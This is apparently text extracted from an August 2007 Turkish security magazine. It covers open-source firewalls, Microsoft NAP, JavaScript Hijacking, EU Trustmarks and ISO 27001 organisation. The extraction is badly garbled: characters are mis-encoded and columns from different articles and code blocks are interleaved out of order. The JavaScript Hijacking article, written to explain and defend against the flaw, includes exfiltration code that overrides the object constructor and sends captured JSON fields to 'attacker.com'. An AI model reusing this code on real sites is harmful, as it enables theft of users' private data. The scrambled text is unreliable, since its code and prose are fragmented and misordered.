kar›lm›fl çimento kadar zay›f. So¤uk Savafl y›llar›nda Amerikan Savunma Bakanl›¤› taraf›ndan gelifltirilen ve nükleer bir sald›r›da ülke içi iletiflimin imkans›z hale gelmesi durumunda alternatif yol olarak haberleflmeyi sa¤layacak bir a¤ görevi verilen ARPANET’in temelinde, TCP/IP protokolü vard›. Proje, esas olarak iletiflimin sa¤lanmas›n› amaçl›yordu. Ama iletiflimin 10. Al›flverifllerde mümkünse sanal kart ya da kap›da ödeme seçeneklerini kullan›n. Tim Berners Lee Fazla Güvenlik Göz mü Ç›kar›r? 18 beyazflapka A¤ustos 2007 Bafla gelen çekilir. “‹nternet 2” denen geliflmifl ve güvenli bir sisteme geçene kadar sorunlarla yaflamay› ö¤renmeye ve kendimizi korumaya mecburuz. Fazla Güvenlik Göz mü Ç›kar›r? A¤ustos 2007 beyazflapka 19 Agu’07 eskiz-6 7/31/07 12:35 AM Page 11 Afflin TAfiKIRAN – Ford Otosan [email protected] Aç›k Kodlu Güvenlik Duvarlar› Bilgisayar a¤lar›n›n ilk olufltu¤u günden bu yana, Unix sistemler bu a¤›n bir parças› olmufltur. Zamanla artan güvenlik ihtiyaçlar› da Unix sistemler arac›l›¤› ile giderilmeye çal›fl›ld›. Güvenlik duvarlar› ile birlikte elle tutulur ilk ihtiyaçlar Layer 3 ve 4 katman›nda filtreleme ifllemleriydi. Zaman ilerledikçe talepler de artt› ve qos, yük dengeleme, cluster çal›flabilme, kolay yönetilebilirlik gibi talepler bunlara eklendi. Unix ve benzer sistemlerin büyük ço¤unlu¤u aç›k kod lisanslar›n› kullanmakta ve güvenlik gereksinimlerini de aç›k kodlu yaz›l›mlarla gidermektedir. Aç›k kod dünyas›nda kullan›lan bafll›ca güvenlik duvar› yaz›l›mlar› ise Iptables, Packet Filter, IPF ve IPFW’dir. Iptables Iptables, Linux çekirde¤indeki Netfilter modüllerini kullanan güvenlik duvar› yaz›l›m›d›r. Netfilter ve Iptables, Linux 2.4 ve 2.6 çekirdek sürümlerinde kullan›lmaktad›r. Daha önceki çekirdek sürümleri olan 2.0’da ipfwadm, 2.2 sürümlerinde ise ipchains kullan›lm›flt›r. Iptables’›n öncekilerden en büyük fark› ise durum korumas› özelli¤inin bulunmas›d›r. IPFilter (IPF) IPFilter, birçok unix türevinde kullan›labilen çok baflar›l› bir TCP/IP paket filtreleme yaz›l›m›d›r. Günümüzde FreeBSD, NetBSD, HP-UX ve Solaris 10 ile birlikte kullan›labilir flekilde gelmektedir. Yüklenebilir çekirdek modülleri (Loadable Kernel Module) olarak ya da çekirde¤e gömülü olarak kullanabilirsiniz. IPF’i FreeBSD üzerinde kullanabilmek için afla¤›daki özellikleri /etc/rc.conf dosyan›zda aktif etmelisiniz. yeniden aktif etmek isterseniz afla¤›daki komutu kullanabilirsiniz. IPFireWall (IPFW) # ipf -Fa -f /etc/ipf.rules OpenBSD Packet Filter (PF) OpenBSD, dünyan›n en güvenli iflletim sistemi olarak bilinmekte. Öyle ki, son on y›l içerisinde ön tan›ml› kurulumda dahi uzaktan eriflilebilir 2 güvenlik a盤› tespit edilmifltir. OpenBSD, 2001 y›l›na kadar IPF kullanmaktayd›. IPF’in 2001 y›l›nda yapt›¤› lisans de¤iflikli¤inden sonra ise söz dizimi çok benzeyen ancak kodlar› yeniden yaz›lm›fl olan Packet Filter’› tasarlad›. PF daha sonra FreeBSD’de de çal›flabilecek hale getirildi. Packet Filter, günümüzdeki ihtiyaçlara en iyi cevap verebilen, modern bir güvenlik duvar›d›r. Temel güvenlik duvar› ifllevlerinin yan› s›ra, yük dengeleme, paket normallefltirmesi, güvenlik duvarlar›n›n ortak çal›flabilirli¤i, güvenlik duvar› üzerinden kimlik do¤rulamas› gibi yeni nesil özelliklere sahiptir. ALTQ ile geliflmifl band geniflli¤i yönetimi de yapabilir. OpenBSD üzerinde Packet Filter’› kullanabilmek için /etc/rc.conf dosyan›zda afla¤›daki de¤erleri ayarlamak yeterlidir. pf_enable=”YES” pf_logd=”YES” pf_conf=”/etc/pf.conf” Di¤er güvenlik duvarlar›ndan en büyük fark› direkt olarak çekirdek seviyesinde çal›flmas› ve yönetilmesi için ek bir yaz›l›ma ihtiyaç duymamas›d›r. FreeBSD ile gelen standart çekirdekte IPFW aktif de¤ildir. IPFW’yi kullanabilmeniz için gerekli modülleri yüklemeniz yeterli olsa da sürekli kullan›lacak bir sistem için çekirde¤i yeniden derlemeniz önerilir. fiekil: NetUstad Yönetim Paneli Packet Filter için ise kapsaml› bir yönetim arayüzü olan PFW’yi kullanman›z› öneririm. IPFW’yi modül olarak eklemek için afla¤›daki yolu izleyebilirsiniz. Ancak unutulmamal›d›r ki IPFW’nin ön tan›ml› çal›flt›r›lmas›nda tüm trafik engellenecektir. Bu nedenle IPFW’nin etkinlefltirilmesi s›ras›nda tüm trafi¤e izin verilebilir. # kldload ipfw && ipfw add allow all from any to any Kal›c› olarak IPFW’yi çal›flt›rmak isterseniz /etc/rc.conf dosyas›na afla¤›daki sat›rlar› eklemeniz yeterlidir. firewall_enable=”YES” firewall_script=”/etc/rc.firewall” IPFW ön tan›ml› yap›land›rma dosyas› /etc/rc.firewall’dur. Güvenlik Duvar› Yönetim Arayüzleri PF’in tüm yap›land›rmas› /etc/pf.conf dosyas› içerine yaz›l›r. ‹stedi¤iniz yap›land›rmay› gerçeklefltirdikten sonra PF’i etkinlefltirmek için, # pfctl –e ipfilter_enable="YES" ipfilter_rules="/etc/ipf.rules" ipmon_enable="YES" ipmon_flags="-Ds" IPFireWall, FreeBSD ekibi taraf›ndan yürütülen bir güvenlik duvar› projesidir. devre d›fl› b›rakmak için ise, Aç›k kodlu güvenlik duvarlar›n›n hemen hepsi konsoldan yap›land›r›lmakta ve yönetilmektedir. Ticari amaçla kullan›lan güvenlik duvarlar›n›n en büyük art›lar›ndan biri ise yönetilmelerinin kolay olmas›d›r. Ticari güvenlik duvar› liderlerinden Check Point’in Smart Dashboard, Netscreen’in Netscreen Security Manager gibi yönetim arayüzleri bulunmakta, bunlar da güvenlik yöneticisinin iflini bir hayli kolaylaflt›rmaktad›r. Ancak aç›k kodlu güvenlik duvarlar› için gelifltirilmifl yönetim arayüzleri de bulunmaktad›r. fiekil: PFW Yönetim Arayüzü # pfctl –d IPFW’un yönetilmesi için Netustad, Iptables’in yönetilmesi için de fwbuilder gibi çok baflar›l› arayüzleri kullanabilirsiniz. komutlar›n› yazman›z yeterlidir. /etc/ipf.rules dosyan›za yazd›¤›n›z güvenlik duvar› kurallar›n› Aç›k Kodlu Güvenlik Duvarlar› 20 beyazflapka A¤ustos 2007 Aç›k Kodlu Güvenlik Duvarlar› A¤ustos 2007 beyazflapka 21 Agu’07 eskiz-6 7/31/07 12:35 AM Page 12 Umut ‹NETAfi – Intertech [email protected] Microsoft Network Access Protection (NAP) Daha önceleri güvenlik konusu, Microsoft firmas›n›n en çok elefltiri alan yanlar›ndan olan ama Bill Gates’in ”Güvenlik bizim için birinci öncelikli konu olacakt›r” aç›klamas›yla yavafl ancak emin ad›mlarla ilerlemeye bafllayan bir konuydu. Microsoft’un güvenlik taraf›ndaki çözümleri, bu aç›klamayla planlanmaya bafllayan ve yavafl yavafl meyvelerini toplamaya bafllad›¤›m›z bu konunun ilk iflaretlerini; son kullan›c›dan en üst katmanda güvenlik özelliklerine kadar, Forefront gibi güvenlik ailesini tasarlayarak ve gerçekten güvenli¤in sonradan eklenmedi¤i, her ad›mda tekrar karfl›m›za gelen, uçtan uca güvenli bir platform tasarlayarak vermiflti. Bu tasar›m›n belki de bizleri en çok ilgilendirecek ve gerçekten önemli bir geliflme olarak nitelendirebilece¤imiz k›sm› ise A¤ Eriflim Korumas› (NAP). Asl›nda Network Access Control (NAC) olarak, baflka markalar ve baflka platformlar için de benzer bir yap› bulunmakla beraber; Microsoft taraf›ndaki NAP çözümünü di¤erlerinden ay›ran özellikler nelerdir, bunlar› aç›klamaya çal›flal›m. Neden NAP ? NAP, temelde bir a¤ eriflim korumas› sa¤layan ve a¤a ba¤lanan bilgisayarlar› tan›mlanan politikalar dahilinde eriflim kontrolü yaparak, onlar›n a¤a dahil olmas›na karar veren bir çözümdür. Bu politikalar istenen antivirus yaz›l›m›n›n hangi versiyonunun olmas›ndan, istenilen patch seviyesine ve hatta windows firewall üzerinde hangi portlar›n aç›k oldu¤u denetimine kadar birçok çeflitli halde bulunmaktad›r. Güvenlik yöneticilerinin asl›nda yönetmekte en çok zorland›klar› noktalar›n bafl›nda ortamlar›n› en uç noktadan itibaren izleyememek ve a¤lar›na ba¤lanan bilgisayarlar›n güvenlik seviyeleri ile di¤er istenilen uygulamalar üzerinde yeterince kontrole sahip olamamak gelmekte. NAP ve di¤er a¤ kontrol çözümleri bu zay›fl›¤› ortadan kald›rmaya yönelik olacakt›r. Microsoft NAP çözümüne bak›ld›¤›nda, NAP mimarisi temelde NAP istemci taraf›, NAP sunucu taraf›, iyilefltirme (remediation) sunucular›, denetleyici ve politika düzenleyici sunuculardan oluflmaktad›r. NAP EC ve NAP ES ad› verilen sunucu ve istemci taraf›ndaki Windows tabanl› NAP uygulama noktalar›, sunucu ve istemci aç›s›ndan ayn› olup; limitli a¤ eriflimini sa¤lama ve “non-compliant” (istenilen politikalara uymayan - NC)istemcilerin ba¤lant› isteklerini karfl›lamaktad›r. SHA ve SHV (System Health Agent/Validator) istemcilerin istenilen politikalar› ve kriterleri sa¤lay›p sa¤lamad›¤›n› kontrol eden modüllerdir. SHA ve iyilefltirme sunucular› hem sistemin o anki durumunu, hem de istenen bir güvenli duruma getirilmesi için neler yap›labilece¤i hak›nda bilgiler verir. NAP çözümünün bütün ba¤lant›lar›n› da SSoH ve SSoHR (System Statement Of Health Response) oluflturur. Windows 2003 özelliklerinden olan “Network Access Quarantine Control” den oldukça farkl› olan NAP, flu anda 4 farkl› tip çözümüyle, çeflitli kurumlar›n çeflitli ihtiyaçlar›na cevap verebilecek fleklinde tasarlanm›flt›r. (fiekil 1) NAP Modelleri IPSec: IPsec iletiflimi HTTP ve HTTPS oturumlar› ile SSoH ve SSoHR iletiflimini NAP istemcisi ve HRA (Health Registration Authority) aras›nda sa¤lar. IPsec limitasyonu sadece ilgili iyilefltirme sunucusundan gerekli politikalar› alamayan NC istemciler için geçerlidir. Bu durumda, uygun olmayan istemciler içerideki korunan a¤a eriflemez. 802.1X : NAP mimarisinin asl›nda en uygulanabilir olan ve uygulanmas› gereken aya¤› 802.1X a¤ eriflim modelleridir. 802.1X destekli bir a¤ cihaz›n›n gönderdi¤i PEAP-TLV paketleri, SSoH and SSoHR iletiflimini istemci ve sunucu aras›nda sa¤lar. 802.1X a¤ iletiflimi k›s›tlamalar› 802.1X destekli a¤ cihaz› üzerinde, IP paket filtrelemesi ile olup; korunan a¤a eriflimi o a¤ baz›nda engeller ya da bir VLAN ID tan›mlanarak a¤ trafi¤ini özel olarak tan›mlanm›fl belirli bir VLAN üzerine yönlendirir. VPN : Uzaktan VPN eriflimleri ise PEAP mesajlar› ile NAP kullanabilen VPN istemcileri ve NAP NPS aras›nda ba¤lant› kurmaya dayan›r. Bu uzaktan ba¤lant›lar›n limitleri IP paket filtrelerine ve korunan iç a¤lara ulafl›m politikalar›na ba¤l›d›r. DHCP : Hepimizin aflina oldu¤u DHCP ise kendi mesajlar› ile beraber SSoH ve SsoHR mesajlar›n› tafl›r. DHCP a¤›n›n limitasyonlar› IPv4 adres konfigurasyonlar› ile korunan iç a¤lara ulafl›m politikalar›na ba¤l›d›r. fiekil 1 NAP Mimarisi Microsoft Network Access Protection (NAP) 22 beyazflapka A¤ustos 2007 fiekil 2 - IPSEC tabanl› NAP çal›flmas› Güvenli A¤’a ba¤lanmak isteyen bir istemci ilk önce DHCP sunucusundan IP al›r, daha sonra üzerinde çal›flan NAP client ile HRA’a sa¤l›k durumunu gönderirir. HRA, merkezdeki IAS sunucusu ile konuflarak ve politikalar› kontrol ederek, istemcinin güvenli a¤a eriflmek için istenilen tüm politikalar› yerine getirip getirmedi¤ine karar verir. E¤er istemci bu politikalar› yerine getiriyorsa güvenli a¤a ba¤lanabilir, e¤er herhangi bir update ihtiyac› varsa; iyilefltirme sunucusuna yönlendirilerek bu update’leri (antivirüs, windows) almas› sa¤lan›r. (fiekil 2) Son olarak söyleyebiliriz ki, NAP ve di¤er a¤ eriflimi kontrol yöntemleri 2007-2008 y›llar›nda biz güvenlikçilerin en çok üzerinde u¤raflaca¤› ve yak›n bir zamanda standart hale gelecek teknolojilerdir. Ya da Microsoft’un belirtti¤i gibi: “NAP the WORLD in 2007” Not: Daha bu yaz› haz›rlan›rken NAP resmi blog sitesinde 3 adet update olmas›, bu konunun flu anda ne kadar “hottopic” oldu¤unu göstermekte. Microsoft Network Access Protection (NAP) A¤ustos 2007 beyazflapka 23 Agu’07 eskiz-6 7/31/07 12:35 AM Page 13 fierif TEKDAL – Red Biliflim [email protected] JavaScript Hijacking Çok say›daki zengin web uygulamas› (Yayg›n ad›yla Ajax uygulamalar›), veri aktar›m metodu olarak JavaScript kullanmaya bafllad›. Bu yaz›da “Javascript Hijacking” olarak adland›raca¤›m›z, JavaScript mesajlar› içindeki de¤erli ve hassas bilgilerin yetkisiz kullan›c›lar taraf›ndan okunabilmesine olanak sa¤layan bir aç›ktan bahsedece¤iz. Geleneksel web uygulamalar›, veri aktar›m› için JavaScript kullanmamas› nedeniyle bu aç›ktan etkilenmiyorlar. Bu konuyla ilgili yayg›n olarak kullan›lan 12 Ajax Framework incelendi. Dördü sunucu tabanl› olmak üzere: Direct Web Remoting (DWR), Microsoft ASP.NET AJAX (Yayg›n ad›yla Atlas), XAJAX ve Google Web Toolkit (GWT). Kalan sekiz tanesi de kullan›c› taraf›nda çal›flan kütüphaneler: Prototype, Script.aculo.us, Dojo, Moo.fx, jQuery, Yahoo! UI, Rico ve MochiKit. Bu inceleme sonucunda sadece DWR 2.0’›n JavaScript Hijacking önleme mekanizmas› gelifltirdi¤i ortaya ç›kt›. Di¤er frameworklerde bu konuyla ilgili bir koruma olmad›¤› gibi, ilgili dökümanlar›nda da konudan bahsedilmiyor. Yaz›l›m gelifltiren birçok kiflinin herhangi bir framework kullanmad›¤›n› biliyoruz. Fakat yap›lan framework incelemelerinde ortaya ç›kan bulgular, framework kullanmadan gelifltirilen özel uygulamalar›n ço¤unda da benzer aç›klar›n oldu¤unu gösteriyor. E¤er uygulaman›z veri aktar›m› için JavaScript kullan›yor, de¤erli ve hassas verilerle çal›fl›yorsa; bu aç›ktan etkilenme olas›l›¤› bir hayli yüksek. JavaScript Hijacking Web taray›c›lar›n›n, kullan›c›lar› kötü niyetli web sitelerinden korumak için Ayn› Kaynak Politikas›’n› (Same Origin Policy) kulland›klar›n› biliyoruz. Ayn› Kaynak Politikas›na göre, JavaScript’in web sayfas›n›n içeriklerine eriflebilmesi için hem JavaScript’in hem de web sayfas›n›n ayn› alan ad› kaynakl› olmas› gerekmektedir. Ayn› Kaynak Politikas› kullan›lmazsa, kötü niyetli bir web sitesi baflka bir kullan›c› tan›m›n› kullanarak, JavaScript kodu çal›flt›rmak suretiyle baflka sitelerdeki hassas bilgileri elde edebilir. Hassas bilgilerin JavaScript ile iletildi¤i Web uygulamalar›nda, kötü niyetli bir kullan›c› JavaScript Hijacking yoluyla Ayn› Kaynak Politikas›’n› delebilir. Ayn› Kaynak Politikas›’ndaki aç›k nokta, herhangi bir web sitesindeki JavaScript kodun, // that whenever the "email" field is set, the method baflka bir web sitesinin içeri¤ine dahil edilip çal›flt›r›labilmesine izin vermesidir. JavaScript haberleflmesi için en yayg›n format JSON (JavaScript Object Notation) dur. JSON bir standart organizasyonu taraf›ndan kabul edilmifl ve kesin kurallarla tan›mlanm›fl bir standart olmasa da genel olarak JavaScript sentaks›n›n bir alt kümesi olarak kabul edilmektedir. JSON, iki tür data yap›s›n› temel al›r: Diziler ve Nesneler. Mesajlar›n bir veya daha fazla geçerli JavaScript ifadesi ile iletildi¤i veri iletim formatlar›, JavaScript Hijacking’e karfl› korumas›zd›r. JSON dizileri, geçerli bir JavaScript ifadesi olarak kendi üzerinde bulunur. Bu nedenle JSON, JavaScript Hijacking’i kolaylaflt›r›r. Baflka bir deyiflle, bir JSON dizisi JavaScript Hijacking’e do¤rudan aç›kt›r. JSON nesneleri ise, geçerli bir JavaScript ifadesi olarak kendi üzerinde bulunan baflka bir JavaScript yap›s›n›n içine paketlendi¤i durumda, sald›r›lara karfl› korumas›z kal›r. // captureObject() will run. Since "email" is the final field, ... // this will allow us to steal the whole object. Host: www.example.com function Object() { Cookie:JSESSIONID=F2rN6HopNzsfXFjHX1c5Ozxi0J5SQZ this.email setter = captureObject; Tr4a5YjaSbAiTnRR } // Send the captured object back to the attacker's Web site (Bu ve takip eden örnekteki HTTP ç›kt›lar›nda, konu ile do¤rudan ilgili olmayan HTTP header’lar› gösterilmemifltir.) function captureObject(x) { var objString = ""; Sunucu, JSON format›nda afla¤›daki gibi bir dizi ile cevap verir: for (fld in this) { objString += fld + ": " + this[fld] + ", "; } HTTP/1.1 200 OK objString += "email: " + x; Cache-control: private var req = new XMLHttpRequest(); Content-Type: text/javascript; charset=utf-8 req.open("GET", "http://attacker.com?obj=" + escape(objString),true); req.send(null); [{"fname":"Brian", "lname":"Chess", "phone":"6502135600", "purchases":60000.00, "email":"[email protected]" }, } </script> <!-- Use a script tag to bring in victim's data --> <script src="http://www.example.com/object.json"></script> Afla¤›daki örnekte, öncelikle sat›fl kay›tlar›n›n yönetildi¤i bir web uygulamas›n›n, istemci ile sunucu bileflenleri aras›ndaki JSON haberleflmesi görülüyor. Hemen peflinden de istemci gibi davranan bir sald›rgan›n, sunucunun gönderdi¤i hassas verilere nas›l ulaflabildi¤ini görebilirsiniz. {"fname":"Katrina", ‹stemci, sunucudan veri talep eder ve gelen sonucu ek’teki kod ile JSON olarak de¤erlendirir. {"fname":"Jacob", "lname":"West", "phone":"6502135600", "lname":"O'Neil", "phone":"6502135600", " p u r c h a s e s " : 1 2 0 0 0 0 . 0 0 , "email":"[email protected]" }, "purchases":45000.00, "email":"[email protected]" }] var object; var req = new XMLHttpRequest(); Bu örnekte JSON, sistemi kullanan kullan›c› ile iliflkili hassas sat›fl bilgilerini içeriyor. Normal koflullarda, di¤er kullan›c›lar›n bu bilgilere Oturum ID’sini bilmeden ulaflmalar› mümkün de¤ildir. (Web uygulamalar›nda Oturum ID’si cookie olarak tutulur.) Buna ra¤men kullan›c›, kötü niyetli bir web sitesini ziyaret ederse; bu site JavaScript Hijacking yoluyla bilgilere ulaflabilir. req.open("GET", "/object.json",true); req.onreadystatechange = function () { if (req.readyState == 4) { var txt = req.responseText; object = eval("(" + txt + ")"); req = null; E¤er kullan›c› afla¤›daki kodu içeren bir siteye girerse, bu kullan›c›ya özel sat›fl verileri sald›rgan›n web sitesine gönderilir. } }; req.send(null); <script> Kod çal›flt›r›ld›¤›nda afla¤›daki gibi bir HTTP talebi oluflturur: JavaScript Hijacking 24 beyazflapka A¤ustos 2007 GET /object.json HTTP/1.1 // override the constructor used to create all objects so Kötü amaçl› kod, aç›k olan sayfaya JSON nesnesini eklemek için script etiketini kullan›r. Baflka bir deyiflle, bu talep yasal uygulama taraf›ndan yap›l›yormufl gibi de¤erlendirilecektir. JSON dizisi istemciye ulaflt›¤›nda, kötü amaçl› web sitesinin içeri¤indeymifl gibi de¤erlendirilecektir. Kötü amaçl› web sayfas›, JSON’un nas›l oluflturuldu¤unu bulabilmek için JavaScript fonksiyonlar›n› yeniden tan›mlar. Bu yolla kötü amaçl› kod, her nesnenin oluflturulmas›na eriflim ve nesne içeriklerinin siteye geri gönderebilmesine olanak sa¤layan bir kanca atar. *Mashup’larda kullan›lmak için gelifltirilen baz› uygulamalar, her JavaScript mesaj›n›n sonunda bir callback fonksiyonu ça¤›r›rlar. Callback fonksiyonu, mashup’daki baflka bir uygulama taraf›ndan tan›mland›¤›n› gösterir. Callback fonksiyonu kullan›lmas›, JavaScript Hijacking ataklar›n› son derece basit bir hale getirir. Tek yap›lmas› gereken bir fonksiyon tan›mlamaktan ibarettir. Bir uygulama ya mashup uyumludur ya da güvenlidir. ‹kisinin bir arada olmas› ise mümkün de¤ildir. *Birden fazla kaynaktan toplad›¤› içerikleri derleyen web siteleri veya uygulamalar. JavaScript Hijacking A¤ustos 2007 beyazflapka 25 Agu’07 eskiz-6 7/31/07 12:35 AM Page 14 Dr. Leyla Keser BERBER – ‹stanbul Bilgi Üniversitesi [email protected] Trustmark Bu akreditasyon flemalar› Trustmark’›n belirli kriterleri yerine getirip getirmedi¤ine iliflkindir. Trustmark Akreditasyon fiemas› Trustmark’da uygulanacak olan isterler ve özellikler için de kaynak olarak hizmet edecektir. AB Trustmark ‹sterleri Trustmark’›n kullan›m› yoluyla e-Ticarette bir self regülasyon yap›lmas› 90’lar›n sonlar›ndan itibaren gündemdeydi. Bu y›llarda bir dizi Trustmark kurulmufl ve Trustmarklar ve di¤er etiketler iflletmelerin web sayfalar›nda art›k daha s›k görülmeye bafllanm›flt›. Trustmark, e-Ticaret ba¤lam›nda uzun y›llar güvenin sa¤lanmas› ölçütü olarak tart›fl›lm›flt›r. e-Ticarette tüketici güveninin sa¤lanmas›n›n veya gelifltirilmesinin di¤er birçok yolu mevcuttur. Trustmark daha çok self regülasyona iliflkin genel tart›flmalarda rol oynamaktad›r. Terminoloji ve Trustmark’lar›n Karakteristikleri bir alternatif uyuflmazl›k çözüm sistemi sunmaya kadar çok farkl› seçenekler ihtiva etmektedir. Tazminat mekanizmas› tüketicinin tazminat isteyebilece¤i durumlarda üçüncü taraf garantisi niteli¤inde de olabilir. Birçok durumda tüketici, davran›fl kurallar› hakk›nda bilgiyi web sayfas›ndaki Trustmark etiketini t›klayarak alabilir. Genel olarak Trustmark organizasyonu web sayfas›nda onayl› iflletmelerin ve/veya web sayfalar›n›n bir listesini yay›nlar. Bu anlamda Trustmark sayfas› ayn› zamanda tüketicinin, belirli bir davran›fl kural› do¤rultusunda onayl› iflletmeleri de bulabilece¤i bir al›flverifl portal› ifllevini de görecektir. Trustmark’›n ay›rd edici karakterlerinden biri, elektronik bir etiket olarak web sayfalar›nda yer almas›d›r. Genel olarak web sayfas›n› kullanan kifliler üzerinde güven uyand›rmak için bir dizi kuraldan oluflmaktad›r. e-Ticarete iliflkin Trustmark’›n d›fl›nda, iflletmelerin web sayfalar›na koyabilecekleri çok farkl› etiketler söz konusudur. Bu etiketler ifl süreçlerine (ISO sertifikalar›), güvenlik ve flifreleme (örne¤in VeriSign), ödeme (Visa, MasterCard), mahremiyet, logistik, web site içerik veya sosyal fark›ndal›k konular›na iliflkin olabilir. Kullan›c› tüketicidir. (B2C ticaret)* Trustmark Akreditasyon fiemas› Trustmark tafl›yan iflletmeler, bir Trustmark organizasyonu taraf›ndan (sertifikalama otoritesi) onayland›klar›na dair “onayl› iflletme” iflareti tafl›rlar. Trustmark, onayl› iflletmenin karfl›lamas› gereken bir dizi gereklilik ortaya koymaktad›r. Bu tür Trustmark’lar Trustmark Akreditasyon fiemas› do¤rultusunda onaylan›rlar. Ancak baz› Trustmark’lar self deklarasyon karakterlidirler. Yani herhangi bir inceleme veya onaya ihtiyaç duymazlar. ETR, online mal sat›fl› uygulamas› için bir temel önermekte ve AB seviyesinde herhangi bir emredici hükmün yerine geçmek veya bu hükümleri ihlal etmek fleklinde bir içeri¤e sahip de¤ildir. Trustmark flemalar› ETR’yi karfl›lamak veya aflmak konusunda teflvik edicidir. Bu isterler do¤rudan tüketiciye yönelik olan e-Ticaret için (B2C) genel Trustmark’lar› hedeflemektedir. AB Trustmark ‹sterleri afla¤›daki konulara iliflkindir: Euro-Label Trustmark’›n› alabilmek ve perakende ifllemler için tacirlerin, Avrupa Davran›fl Kurallar›n› yerine getirmesi gerekir. Euro-Label organizasyonu tacirlerin bu Davran›fl Kurallar›na uyup uymad›¤›n› kontrol etmekle yükümlüdür. Avrupa Davran›fl Kurallar› EU mevzuat›na göre kaleme al›nm›flt›r. Özellikle e-Ticaret’e, uzaktan sat›fllara, kiflisel verilerin korunmas›na ve garantilere iliflkin AB Direktifleri göz önünde bulundurulmufltur. Mekanizma logoyu web sitesinde tafl›yan tacirin güvenilir oldu¤unu ortaya koymaktad›r. Euro-Label: 1. Trustmark flemalar›nda yüksek standart, ölçülebilirlik ve amaç 2. Tüketiciler ve iflletmeler için Trustmark flemalar›n›n fleffaf olmas› 3. Tüketiciler ve iflletmeler için Trustmark flemalar›n›n eriflilebilir ve görünebilir olmas› • fiirketin satt›¤› ürünün güvenilir oldu¤unu, • Sat›fl koflullar›n›n web sayfas›nda herkese aç›k ve eriflilebilir oldu¤unu, • Tacirin kiflisel verilerin korunmas› mevzuat›na uydu¤unu, • Müflterinin siparifl verdi¤i ürünün teslim edilece¤ini, • ‹fllem boyunca herhangi bir aksakl›k oldu¤unda, bir alternatif uyuflmazl›k çözüm mekanizmas›n›n devreye girece¤ini sa¤lamaya çal›flmaktad›r. 4. Trustmark flemalar›n›n kapsam› ve içeri¤i 5. Trustmark flemalar›n›n çal›flma flekli 6. Trustmark flemalar› için baflvuru sahiplerinin de¤erlendirilmesi Genel olarak Trustmark organizasyonu, müracaat eden iflletmenin web sayfas›n› yeniden inceleme iflini gerçeklefltirir. Onayl› iflletme ile Trustmark organizasyonu aras›nda davran›fl kurallar›n›n yorumuna iliflkin olarak uyuflmazl›k ç›kt›¤› takdirde, bir onay komitesi veya bir dan›flma kurulu, sorun hakk›nda karar verebilmektedir. Baz› Trustmarklar tüketici haklar›n›n yerine getirilmesi, yani onayl› iflletme ve tüketici aras›ndaki uyuflmazl›¤›n çözülmesi özelli¤ine sahiptir. Bu özellikler tüketicinin dava açmas› ihtimalinde destek hizmetinden, komple 7. Denetleme sistemi 8. ‹cra sistemi Euro-Label Trustmark, bizatihi bir Trustmark olarak ve bir “fiemsiye Trustmark” olarak alg›lanabilir. Farkl› ülkelerde farkl› etiketler mevcut olmas›na ra¤men, tüm etiketler Avrupa Davran›fl Kurallar› do¤rultusunda ortak özellikler tafl›maktad›rlar. Her ülke onaylad›¤› iflletmenin davran›fl kurallar›na ba¤l› oldu¤unu sa¤lamaya çal›fl›r ancak bu her bir ülkenin Trustmark için ek koflullar aramas›na da engel de¤ildir. Euro-Label Trustmark, 7 AB ülkesinde mevcuttur. (Avusturya, Fransa, Almanya, ‹talya, Malta, ‹spanya ve Polonya) Euro-Label’in amac› tüm AB ülkelerine yay›lmakt›r. 9. Teknik güvenlik Euro-Label Euro-Label3 AB’nin tüketiciler ve perakende sat›c›lar› için gelifltirdi¤i elektronik Trustmark’t›r. Amac› online ticaret için güvenilir ve adil bir ortak temelin mevcudiyetini Trustmark 26 beyazflapka A¤ustos 2007 AB Trustmark ‹sterleri (ETR), elektronik ticarette tüketicinin korunmas› bak›m›ndan yüksek standartlar sa¤lamak ve mal ve hizmetlerin internet üzerinden sat›fl›n› teflvik etmek amac›yla BEUC 1 ve UNICE 2 taraf›ndan haz›rlanm›flt›r. temin ederek, Avrupa içindeki elektronik ulusal ve s›n›r ötesi elektronik ifllemlerin artmas›n› teflvik etmektir. Euro-Label AB Komisyonun finansal katk›s› ile kurulmufltur. Avusturya, Fransa, Almanya, ‹talya, Malta, ‹spanya ve Polonya’dan profesyonel kurulufllar, Euro-Label organizas-yonuna ve ayn› zamanda EuroCommerce’e taraft›rlar. [1] www.beuc.org [2] www.unice.org [3] www.euro-label.com *Business to customer – Firmadan müflteriye e-Ticaret Trustmark A¤ustos 2007 beyazflapka 27 Agu’07 eskiz-6 7/31/07 12:35 AM Page 15 Murat LOSTAR – Lostar Bilgi Güvenli¤i [email protected] Bilgi Güvenli¤i’nin Organizasyonu ve Koordinasyonu TS ISO/IEC 27001:2005-A.6.1 TS ISO/IEC 27001:2005 standard›n›n kontrol hedefleri ve kontrollerinin s›raland›¤› “Ek A” bölümü tüm kontrolleri onbir ayr› ana bafll›kta ele al›r. Bu yaz› ve ilgili ana bafll›k temel olarak iki kontrol hedefini, kurum içindeki organizasyonu ve d›fl taraflarla koordinasyonu hedefliyor. Gün geçtikçe bilgiye ba¤›ml› hale gelen kurumlardaki yöneticiler, ayn› zamanda karmafl›klaflan ifl süreçleri nedeniyle klasik yönetim biçimlerini matriks yönetime ya da yatay ve dikey kritik baflar› faktörlerine (KPI) b›rak›rken, benzer bir ihtiyac›n bilgi güvenli¤inin de bafl›na gelece¤ini planlamam›fllard›. Ancak üretimden sat›fla, finanstan araflt›rma gelifltirmeye, hemen tüm ifl süreçleri nas›l eskiden bir departman ismi iken, bugün farkl› çal›flma gruplar›n›n bir arada çal›flmalar›n› ve etkileflim gerektiriyorsa, bilgi güvenli¤i de farkl› gruplar›n bir arada çal›flmas›na ba¤l› olarak ilerleyebilir. Üstelik sadece bilgi güvenli¤i kapsam› içindeki süreçler yönetimleri ve bölümleri de¤il, ilgili tüm destek bölümleri de genel bilgi güvenli¤i organizasyonu içinde yer almal›lar. Hemen her konuda oldu¤u gibi, bilgi güvenli¤i konusunda da üst yönetim, kurum içi organizasyonun parças› olmal›. Gerekli kurumsal yönlendirmeyi, sorumluluk atamalar›n› gerçeklefltirmeli. Kurumun büyüklü¤üne ve kurumsallaflma düzeyine göre bu destek farkl›laflabilir. Az kiflinin çal›flt›¤›, hiyerarflik yönetim yap›s›n›n geliflmedi¤i kurumlarda, direkt üst yönetim bu görevi üstlenirken; büyük, hiyerarflik düzenin yer ald›¤› kurumsal organizasyonlarda bu görev, bir “üst yönetim temsilcisi” taraf›ndan da gerçeklefltirilebilir. Yönetim birinci önceli¤i, bilgi güvenli¤i hedeflerinin aç›k ve net biçimde tüm çal›flanlara aktar›lmas›d›r. Bu ifllem öncelikle bilgi güvenli¤i politikas› ile 